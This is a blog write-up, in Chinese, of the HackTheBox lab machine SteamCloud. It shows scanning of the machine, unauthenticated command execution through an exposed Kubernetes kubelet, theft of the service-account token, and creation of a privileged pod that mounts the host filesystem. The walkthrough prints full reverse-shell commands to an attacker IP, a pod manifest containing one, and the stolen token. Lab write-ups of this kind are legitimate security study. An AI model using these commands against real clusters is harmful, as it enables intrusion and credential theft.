title: HackTheBox-SteamCloud-Kubernetes未授权访问 author: Mosaic Theory layout: true categories: 漏洞实验 tags:
• 打靶日记
Wasting time is robbing oneself.
浪費時間就是掠奪自己。
HackTheBox-SteamCloud:
Recon:
masscan:
>> sudo masscan -p1-65535,U:1-65535 10.10.11.133 --rate 2000 -e tun0
[sudo] mosaictheory 的密码:
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2022-05-14 10:02:32 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 22/tcp on 10.10.11.133
Discovered open port 2379/tcp on 10.10.11.133
Discovered open port 10256/tcp on 10.10.11.133
Discovered open port 8443/tcp on 10.10.11.133
Discovered open port 10249/tcp on 10.10.11.133
Discovered open port 10250/tcp on 10.10.11.133
Discovered open port 2380/tcp on 10.10.11.133 Nmap:
>> sudo nmap -sC -sV -Pn 10.10.11.133 -p22,2379,10256,8443,10249,1250,2380
Nmap scan report for 10.10.11.133
Host is up (0.33s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 fc:fb:90:ee:7c:73:a1:d4:bf:87:f8:71:e8:44:c6:3c (RSA)
| 256 46:83:2b:1b:01:db:71:64:6a:3e:27:cb:53:6f:81:a1 (ECDSA)
|_ 256 1d:8d:d3:41:f3:ff:a4:37:e8:ac:78:08:89:c2:e3:c5 (ED25519)
1250/tcp closed swldy-sias
2379/tcp open ssl/etcd-client?
| ssl-cert: Subject: commonName=steamcloud
| Subject Alternative Name: DNS:localhost, DNS:steamcloud, IP Address:10.10.11.133, IP Address:127.0.0.1, IP Address:0:0:0:0:0:0:0:1
| Not valid before: 2022-05-14T10:02:00
|_Not valid after: 2023-05-14T10:02:00
| tls-alpn:
|_ h2
|_ssl-date: TLS randomness does not represent time
2380/tcp open ssl/etcd-server?
| tls-alpn:
|_ h2
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=steamcloud
| Subject Alternative Name: DNS:localhost, DNS:steamcloud, IP Address:10.10.11.133, IP Address:127.0.0.1, IP Address:0:0:0:0:0:0:0:1
| Not valid before: 2022-05-14T10:02:00
|_Not valid after: 2023-05-14T10:02:01
8443/tcp open ssl/https-alt
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 403 Forbidden
| Audit-Id: 259e34c0-7408-465b-bb52-13e9b6c3a1bd
| Cache-Control: no-cache, private
| Content-Type: application/json
| X-Content-Type-Options: nosniff
| X-Kubernetes-Pf-Flowschema-Uid: 02934147-5409-4441-b7e6-6388d55f4dd4
| X-Kubernetes-Pf-Prioritylevel-Uid: 87805fbd-eebb-4063-b814-3d599d9f6cca
| Date: Sat, 14 May 2022 10:06:08 GMT
| Content-Length: 212
| {"kind":"Status","apiVersion":"v1","metadata":{},"status":"Failure","message":"forbidden: User "system:anonymous" cannot get path "/nice ports,/Trinity.txt.bak"","reason":"Forbidden","details":{},"code":403}
| GetRequest:
| HTTP/1.0 403 Forbidden
| Audit-Id: f6ce1760-50c1-44b5-8c1c-f24c8126a46c
| Cache-Control: no-cache, private
| Content-Type: application/json
| X-Content-Type-Options: nosniff
| X-Kubernetes-Pf-Flowschema-Uid: 02934147-5409-4441-b7e6-6388d55f4dd4
| X-Kubernetes-Pf-Prioritylevel-Uid: 87805fbd-eebb-4063-b814-3d599d9f6cca
| Date: Sat, 14 May 2022 10:06:05 GMT
| Content-Length: 185
| {"kind":"Status","apiVersion":"v1","metadata":{},"status":"Failure","message":"forbidden: User "system:anonymous" cannot get path "/"","reason":"Forbidden","details":{},"code":403}
| HTTPOptions:
| HTTP/1.0 403 Forbidden
| Audit-Id: 786acb3a-4dbc-4702-909f-b97968ee50a7
| Cache-Control: no-cache, private
| Content-Type: application/json
| X-Content-Type-Options: nosniff
| X-Kubernetes-Pf-Flowschema-Uid: 02934147-5409-4441-b7e6-6388d55f4dd4
| X-Kubernetes-Pf-Prioritylevel-Uid: 87805fbd-eebb-4063-b814-3d599d9f6cca
| Date: Sat, 14 May 2022 10:06:07 GMT
| Content-Length: 189
|_ {"kind":"Status","apiVersion":"v1","metadata":{},"status":"Failure","message":"forbidden: User "system:anonymous" cannot options path "/"","reason":"Forbidden","details":{},"code":403}
|_http-title: Site doesn't have a title (application/json).
| tls-alpn:
| h2
|_ http/1.1
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=minikube/organizationName=system:masters
| Subject Alternative Name: DNS:minikubeCA, DNS:control-plane.minikube.internal, DNS:kubernetes.default.svc.cluster.local, DNS:kubernetes.default.svc, DNS:kubernetes.default, DNS:kubernetes, DNS:localhost, IP Address:10.10.11.133, IP Address:10.96.0.1, IP Address:127.0.0.1, IP Address:10.0.0.1
| Not valid before: 2022-05-13T10:01:57
|_Not valid after: 2025-05-13T10:01:57
10249/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
10256/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8443-TCP:V=7.92%T=SSL%I=7%D=5/14%Time=627F7F0D%P=x86_64-pc-linux-gn
SF:u%r(GetRequest,22F,"HTTP/1\.0\x20403\x20Forbidden\r\nAudit-Id:\x20f6ce1
SF:760-50c1-44b5-8c1c-f24c8126a46c\r\nCache-Control:\x20no-cache,\x20priva
SF:te\r\nContent-Type:\x20application/json\r\nX-Content-Type-Options:\x20n
SF:osniff\r\nX-Kubernetes-Pf-Flowschema-Uid:\x2002934147-5409-4441-b7e6-63
SF:88d55f4dd4\r\nX-Kubernetes-Pf-Prioritylevel-Uid:\x2087805fbd-eebb-4063-
SF:b814-3d599d9f6cca\r\nDate:\x20Sat,\x2014\x20May\x202022\x2010:06:05\x20
SF:GMT\r\nContent-Length:\x20185\r\n\r\n{\"kind\":\"Status\",\"apiVersion\
SF:":\"v1\",\"metadata\":{},\"status\":\"Failure\",\"message\":\"forbidden
SF::\x20User\x20\\\"system:anonymous\\\"\x20cannot\x20get\x20path\x20\\\"/
SF:\\\"\",\"reason\":\"Forbidden\",\"details\":{},\"code\":403}\n")%r(HTTP
SF:Options,233,"HTTP/1\.0\x20403\x20Forbidden\r\nAudit-Id:\x20786acb3a-4db
SF:c-4702-909f-b97968ee50a7\r\nCache-Control:\x20no-cache,\x20private\r\nC
SF:ontent-Type:\x20application/json\r\nX-Content-Type-Options:\x20nosniff\
SF:r\nX-Kubernetes-Pf-Flowschema-Uid:\x2002934147-5409-4441-b7e6-6388d55f4
SF:dd4\r\nX-Kubernetes-Pf-Prioritylevel-Uid:\x2087805fbd-eebb-4063-b814-3d
SF:599d9f6cca\r\nDate:\x20Sat,\x2014\x20May\x202022\x2010:06:07\x20GMT\r\n
SF:Content-Length:\x20189\r\n\r\n{\"kind\":\"Status\",\"apiVersion\":\"v1\
SF:",\"metadata\":{},\"status\":\"Failure\",\"message\":\"forbidden:\x20Us
SF:er\x20\\\"system:anonymous\\\"\x20cannot\x20options\x20path\x20\\\"/\\\
SF:"\",\"reason\":\"Forbidden\",\"details\":{},\"code\":403}\n")%r(FourOhF
SF:ourRequest,24A,"HTTP/1\.0\x20403\x20Forbidden\r\nAudit-Id:\x20259e34c0-
SF:7408-465b-bb52-13e9b6c3a1bd\r\nCache-Control:\x20no-cache,\x20private\r
SF:\nContent-Type:\x20application/json\r\nX-Content-Type-Options:\x20nosni
SF:ff\r\nX-Kubernetes-Pf-Flowschema-Uid:\x2002934147-5409-4441-b7e6-6388d5
SF:5f4dd4\r\nX-Kubernetes-Pf-Prioritylevel-Uid:\x2087805fbd-eebb-4063-b814
SF:-3d599d9f6cca\r\nDate:\x20Sat,\x2014\x20May\x202022\x2010:06:08\x20GMT\
SF:r\nContent-Length:\x20212\r\n\r\n{\"kind\":\"Status\",\"apiVersion\":\"
SF:v1\",\"metadata\":{},\"status\":\"Failure\",\"message\":\"forbidden:\x2
SF:0User\x20\\\"system:anonymous\\\"\x20cannot\x20get\x20path\x20\\\"/nice
SF:\x20ports,/Trinity\.txt\.bak\\\"\",\"reason\":\"Forbidden\",\"details\"
SF::{},\"code\":403}\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 150.10 secondskubernetes我第一次接触,我尝试寻找官方文档:
https://kubernetes.io/docs/concepts/overview/what-is-kubernetes/2379端口是https协议,但是如果我尝试访问,会拒绝我,并且一直是我最初浏览器提示的证书不可信的警告。2380也是如此:
8443会自动为我弹出一些信息,看来是不允许匿名用户访问:
10249与10256是一样的:
kubernetes初探:
Kubectl:
触及知识盲区了,幸好我在官方文档里找到了这个:
https://kubernetes.io/docs/tasks/tools/
或许我可以试着用该工具去管理目标,即使按经验来讲这种功能要用户名密码认证而我什么都没有,可通过命令进行下载:
>> curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl"下载完后再下载校验工具进行校验:
>> curl -LO "https://dl.k8s.io/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl.sha256"echo "$(cat kubectl.sha256) kubectl" | sha256sum --check
kubectl: 成功通过如下命令进行安装:
sudo install -o root -g root -m 0755 kubectl /usr/local/bin/kubectl查看信息,安装成功:
>> kubectl version --client --output=yaml
clientVersion:
buildDate: "2022-05-03T13:46:05Z"
compiler: gc
gitCommit: 4ce5a8954017644c5420bae81d72b09b735c21f0
gitTreeState: clean
gitVersion: v1.24.0
goVersion: go1.18.1
major: "1"
minor: "24"
platform: linux/amd64
kustomizeVersion: v4.5.4但是我尝试链接目标,果不其然的都要用户名和密码:
>> sudo kubectl --server https://10.10.11.133:10249 get pod
Please enter Username: admin
Please enter Password:
Unable to connect to the server: http: server gave HTTP response to HTTPS clientkubeletctl:
这总不能让我硬猜吧。接着Google帮我找到了这个:
https://github.com/cyberark/kubeletctl它有很多功能:
Available Commands:
attach Attach to a container
configz Return kubelet's configuration.
containerLogs Return container log
cri Run commands inside a container through the Container Runtime Interface (CRI)
debug Return debug information (pprof or flags)
exec Run commands inside a container
healthz Check the state of the node
help Help about any command
log Return the log from the node.
metrics Return resource usage metrics (such as container CPU, memory usage, etc.)
pods Get list of pods on the node
portForward Attach to a container
run Run commands inside a container
runningpods Returns all pods running on kubelet from looking at the container runtime cache.
scan Scans for nodes with opened kubelet API
spec Cached MachineInfo returned by cadvisor
stats Return statistical information for the resources in the node.
version Print the version of the kubeletctl我可以尝试访问目标的PODS,它奏效了:
>> kubeletcl pods -s 10.10.11.133
┌───────────────────────────────────────────────────────────────────────────────────┐
│ Pods from Kubelet │
├───┬────────────────────────────────────┬─────────────┬─────────────────────────┤
│ │ POD │ NAMESPACE │ CONTAINERS │
├───┼────────────────────────────────────┼─────────────┼─────────────────────────┤
│ 1 │ coredns-78fcd69978-qr9j8 │ kube-system │ coredns │
│ │ │ │ │
├───┼────────────────────────────────────┼─────────────┼─────────────────────────┤
│ 2 │ nginx │ default │ nginx │
│ │ │ │ │
├───┼────────────────────────────────────┼─────────────┼─────────────────────────┤
│ 3 │ etcd-steamcloud │ kube-system │ etcd │
│ │ │ │ │
├───┼────────────────────────────────────┼─────────────┼─────────────────────────┤
│ 4 │ kube-apiserver-steamcloud │ kube-system │ kube-apiserver │
│ │ │ │ │
├───┼────────────────────────────────────┼─────────────┼─────────────────────────┤
│ 5 │ kube-controller-manager-steamcloud │ kube-system │ kube-controller-manager │
│ │ │ │ │
├───┼────────────────────────────────────┼─────────────┼─────────────────────────┤
│ 6 │ kube-scheduler-steamcloud │ kube-system │ kube-scheduler │
│ │ │ │ │
├───┼────────────────────────────────────┼─────────────┼─────────────────────────┤
│ 7 │ storage-provisioner │ kube-system │ storage-provisioner │
│ │ │ │ │
├───┼────────────────────────────────────┼─────────────┼─────────────────────────┤
│ 8 │ kube-proxy-4cnt8 │ kube-system │ kube-proxy │
│ │ │ │ │
└───┴────────────────────────────────────┴─────────────┴─────────────────────────┘
只有nginx不在kube-system空间中,不知道这是否是作者为我遗留的路径。
User.txt:
在帮助信息中我还看到了exec,或许我可以试着去执行一下命令:
>> kubeletcl -s 10.10.11.133 exec "id" -p nginx -c nginx
uid=0(root) gid=0(root) groups=0(root)它可以,而且还是root,或许我可以试着读取root.txt:
>> kubeletcl -s 10.10.11.133 exec "cat /root/root.txt" -p nginx -c nginx
cat: /root/root.txt: No such file or directory
command terminated with exit code 1它告诉我没有文件,哦,root下边是一个user.txt:
>> kubeletcl -s 10.10.11.133 exec "ls /root" -p nginx -c nginx
user.txt
>> kubeletcl -s 10.10.11.133 exec "cat /root/user.txt" -p nginx -c nginx
cd8bbd...............................root.txt:
我尝试反弹bash:
>> kubeletcl -s 10.10.11.133 exec "which bash" -p nginx -c nginx
/bin/bash
>> kubeletcl -s 10.10.11.133 exec "bash -c 'bash -i >& /dev/tcp/10.10.16.4/9001 0>&1'" -p nginx -c nginx
-i: -c: line 0: unexpected EOF while looking for matching `''
-i: -c: line 1: syntax error: unexpected end of file
command terminated with exit code 1
>> kubeletcl -s 10.10.11.133 exec "bash -i >& /dev/tcp/10.10.16.4/9001 0>&1" -p nginx -c nginx
bash: >: No such file or directory
command terminated with exit code 127我尝试编码:
>> kubeletcl -s 10.10.11.133 exec 'echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi40LzkwMDEgMD4mMQo="| base64 -d | bash"' -p nginx -c nginx
"YmFzaCAtaSA JiAvZGV2L3RjcC8xMC4xMC4xNi40LzkwMDEgMD4mMQo="| base64 -d | bash"不太行,怎么编的就怎么还回来,似乎它只能执行一些简单的命令,我又在谷歌搜了一堆,我找到了这篇文章:
https://labs.f-secure.com/blog/attacking-kubernetes-through-kubelet它为我讲述了kubernetes如何测试,会有一些敏感目录,例如:
/var/run/secrets/kubernetes.io/serviceaccount/token我可以窃取到:
>> kubeletcl -s 10.10.11.133 exec "cat /var/run/secrets/kubernetes.io/serviceaccount/token" -p nginx -c nginx
eyJhbGciOiJSUzI1NiIsImtpZCI6InNaQkd1a0xEWVNDeHBhSTNXTVE5Yl82SjExZnRtX3JxN3FWTmtGQXMzS28ifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiXSwiZXhwIjoxNjg0MDY3MzM1LCJpYXQiOjE2NTI1MzEzMzUsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJkZWZhdWx0IiwicG9kIjp7Im5hbWUiOiJuZ2lueCIsInVpZCI6ImJlODRjNTU0LTg1MDItNGFhZi05OGNhLWQyZTgzNTNjOTNjNSJ9LCJzZXJ2aWNlYWNjb3VudCI6eyJuYW1lIjoiZGVmYXVsdCIsInVpZCI6IjYxYjFkMDBkLTMwNmUtNDE4MS04NzdiLWFkNDQxMTk3ZTk1MSJ9LCJ3YXJuYWZ0ZXIiOjE2NTI1MzQ5NDJ9LCJuYmYiOjE2NTI1MzEzMzUsInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDpkZWZhdWx0OmRlZmF1bHQifQ.F-aIO1xYv8b_6WusHstg43jLPDt_BtYxOvXSH4MZtf71OzjuuKXpN4Dsi8OMQX-IQ_yMyhjTYWhjDZpZ-Lb1bmEJbDbUDM1DqfVvxkmAHp_sGQqxbyqnkM04EvIhcjrKW8I_pQKSkK22NGZYcManSUmJuZLFn12XSKzOp3javgR62St4KCYemXLrd-N-s4wUpUkUCgbabfLkx7TJtSOjM2FRCqkfZo9w5sQ_mXhbKs998EXV-VdWR-iWt1A3hggteiIn4j3LyUxmET9UD1jXU8N6kzYZkrWTdoUCyQSK5jolwCAYdsoCN8QGHYPFxDgTvJRzXz7kNDXXL6D_BCf5Ow 我尝试了解码,但是:
>> echo "eyJhbGciOiJSUzI1NiIsImtpZCI6InNaQkd1a0xEWVNDeHBhSTNXTVE5Yl82SjExZnRtX3JxN3FWTmtGQXMzS28ifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiXSwiZXhwIjoxNjg0MDY3MzM1LCJpYXQiOjE2NTI1MzEzMzUsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJkZWZhdWx0IiwicG9kIjp7Im5hbWUiOiJuZ2lueCIsInVpZCI6ImJlODRjNTU0LTg1MDItNGFhZi05OGNhLWQyZTgzNTNjOTNjNSJ9LCJzZXJ2aWNlYWNjb3VudCI6eyJuYW1lIjoiZGVmYXVsdCIsInVpZCI6IjYxYjFkMDBkLTMwNmUtNDE4MS04NzdiLWFkNDQxMTk3ZTk1MSJ9LCJ3YXJuYWZ0ZXIiOjE2NTI1MzQ5NDJ9LCJuYmYiOjE2NTI1MzEzMzUsInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDpkZWZhdWx0OmRlZmF1bHQifQ.F-aIO1xYv8b_6WusHstg43jLPDt_BtYxOvXSH4MZtf71OzjuuKXpN4Dsi8OMQX-IQ_yMyhjTYWhjDZpZ-Lb1bmEJbDbUDM1DqfVvxkmAHp_sGQqxbyqnkM04EvIhcjrKW8I_pQKSkK22NGZYcManSUmJuZLFn12XSKzOp3javgR62St4KCYemXLrd-N-s4wUpUkUCgbabfLkx7TJtSOjM2FRCqkfZo9w5sQ_mXhbKs998EXV-VdWR-iWt1A3hggteiIn4j3LyUxmET9UD1jXU8N6kzYZkrWTdoUCyQSK5jolwCAYdsoCN8QGHYPFxDgTvJRzXz7kNDXXL6D_BCf5Ow" | base64 -d
{"alg":"RS256","kid":"sZBGukLDYSCxpaI3WMQ9b_6J11ftm_rq7qVNkFAs3Ko"}base64: 输入无效它还有其他敏感目录:
/run/secrets/kubernetes.io/serviceaccount
/var/run/secrets/kubernetes.io/serviceaccount>> kubeletcl -s 10.10.11.133 exec "ls /run/secrets/kubernetes.io/serviceaccount" -p nginx -c nginx
ca.crt namespace token>> kubeletcl -s 10.10.11.133 exec "ls /var/run/secrets/kubernetes.io/serviceaccount" -p nginx -c nginx
ca.crt namespace token以免复制粘贴错误,可以转存一下:
>> kubeletcl -s 10.10.11.133 exec "cat /run/secrets/kubernetes.io/serviceaccount/ca.crt" -p nginx -c nginx | tee ca.crt
-----BEGIN CERTIFICATE-----
MIIDBjCCAe6gAwIBAgIBATANBgkqhkiG9w0BAQsFADAVMRMwEQYDVQQDEwptaW5p
a3ViZUNBMB4XDTIxMTEyOTEyMTY1NVoXDTMxMTEyODEyMTY1NVowFTETMBEGA1UE
AxMKbWluaWt1YmVDQTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAOoa
YRSqoSUfHaMBK44xXLLuFXNELhJrC/9O0R2Gpt8DuBNIW5ve+mgNxbOLTofhgQ0M
HLPTTxnfZ5VaavDH2GHiFrtfUWD/g7HA8aXn7cOCNxdf1k7M0X0QjPRB3Ug2cID7
deqATtnjZaXTk0VUyUp5Tq3vmwhVkPXDtROc7QaTR/AUeR1oxO9+mPo3ry6S2xqG
VeeRhpK6Ma3FpJB3oN0Kz5e6areAOpBP5cVFd68/Np3aecCLrxf2Qdz/d9Bpisll
hnRBjBwFDdzQVeIJRKhSAhczDbKP64bNi2K1ZU95k5YkodSgXyZmmkfgYORyg99o
1pRrbLrfNk6DE5S9VSUCAwEAAaNhMF8wDgYDVR0PAQH/BAQDAgKkMB0GA1UdJQQW
MBQGCCsGAQUFBwMCBggrBgEFBQcDATAPBgNVHRMBAf8EBTADAQH/MB0GA1UdDgQW
BBSpRKCEKbVtRsYEGRwyaVeonBdMCjANBgkqhkiG9w0BAQsFAAOCAQEA0jqg5pUm
lt1jIeLkYT1E6C5xykW0X8mOWzmok17rSMA2GYISqdbRcw72aocvdGJ2Z78X/HyO
DGSCkKaFqJ9+tvt1tRCZZS3hiI+sp4Tru5FttsGy1bV5sa+w/+2mJJzTjBElMJ/+
9mGEdIpuHqZ15HHYeZ83SQWcj0H0lZGpSriHbfxAIlgRvtYBfnciP6Wgcy+YuU/D
xpCJgRAw0IUgK74EdYNZAkrWuSOA0Ua8KiKuhklyZv38Jib3FvAo4JrBXlSjW/R0
JWSyodQkEF60Xh7yd2lRFhtyE8J+h1HeTz4FpDJ7MuvfXfoXxSDQOYNQu09iFiMz
kf2eZIBNMp0TFg==
-----END CERTIFICATE-----也可以创建一个变量用来保存token,就像powershell那样:
export token=$(kubeletctl -s 10.10.11.133 exec "cat /run/secrets/kubernetes.io/serviceaccount/token" -p nginx -c nginx)然后可以拿着证书与令牌,对 Kubernetes API 进行身份验证:
>> kubectl --server https://10.10.11.133:8443 --certificate-authority=ca.crt --token=$token get pod
NAME READY STATUS RESTARTS AGE
nginx 1/1 Running 0 164m看起来可行,这次它没要求我输入账号密码,可是我能做什么呢。在kubectl还有auth can-i命令,可以查看我给定账户有什么权限:
>> kubectl auth can-i --list --server https://10.10.11.133:8443 --certificate-authority=ca.crt --token=$token
Resources Non-Resource URLs Resource Names Verbs
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
pods [] [] [get create list]
[/.well-known/openid-configuration] [] [get]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/openid/v1/jwks] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]我似乎可以创建文件,我可以拿上边示例文章中的payload试试:
apiVersion: v1
kind: Pod
metadata:
name: mosaic-pod
spec:
containers:
- name: mosaic-pod
image: nginx:1.14.2
command: ["/bin/bash"]
args: ["-c", "bash -i >& /dev/tcp/10.10.16.4/9001 0>&1"]
volumeMounts:
- name: host
mountPath: /host
volumes:
- name: host
hostPath:
path: /
type: Directory我创建成功了:
>> kubectl --insecure-skip-tls-verify=true \
--server="https://10.10.11.133:8443" \
--token="$token" \
create -f shell.yaml
pod/mosa-pod created而我也收到了反弹shell:
>> nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.16.4] from (UNKNOWN) [10.10.11.133] 55666
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
root@mosa-pod:/# 我尝试查找root.txt:
root@mosa-pod:/# find / -name root.txt
find: File system loop detected; '/host/var/lib/docker/overlay2/74c1cf237c3f1666cfd71a7f54a2263ea73bf931e5fdc8b4db43d76007062980/merged' is part of the same file system loop as '/'.
/host/root/root.txt
find: '/host/proc/1/map_files': Permission denied
find: '/host/proc/2/map_files': Permission denied
find: '/host/proc/3/map_files': Permission denied
root@mosa-pod:/# cat /host/root/root.txt
113....................................